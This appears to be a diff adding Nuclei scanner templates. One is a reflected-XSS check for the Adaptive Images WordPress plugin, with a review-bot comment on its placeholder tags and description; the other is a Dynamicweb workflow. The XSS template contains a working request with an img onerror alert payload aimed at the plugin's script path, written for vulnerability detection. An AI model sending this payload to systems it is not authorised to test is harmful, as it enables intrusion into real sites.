- type: regex


@ -0,0 +1,26 @@
id: wp-adaptive-xss
info:
name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
reference: https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
tags: tags
requests:
- raw:
- |+
GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(%22document.domain%22)%3E/?debug=true HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- <img/src/onerror=alert("document.domain")>
- type: status
status:
- 200
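Review bot: `tags: tags` is a placeholder that was never filled in, so the template is selectable only by the literal tag `tags`. Based on the name and the `wp-content/plugins/adaptive-images` path, `tags: wordpress,wp-plugin,xss,adaptive-images` follows the convention of the other WordPress templates in this commit (`cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth`). The `description` should also name the plugin, e.g. `description: The Adaptive Images WordPress plugin before 0.6.69 does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a reflected Cross-Site Scripting issue.`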


@ -0,0 +1,11 @@
id: dynamicweb-workflow
info:
name: Dynamicweb Security Checks
author: pdteam
description: A simple workflow that runs all dynamicweb related nuclei templates on a given target.
workflows:
- template: exposed-panels/dynamicweb-panel.yaml
subtemplates:
- tags: dynamicweb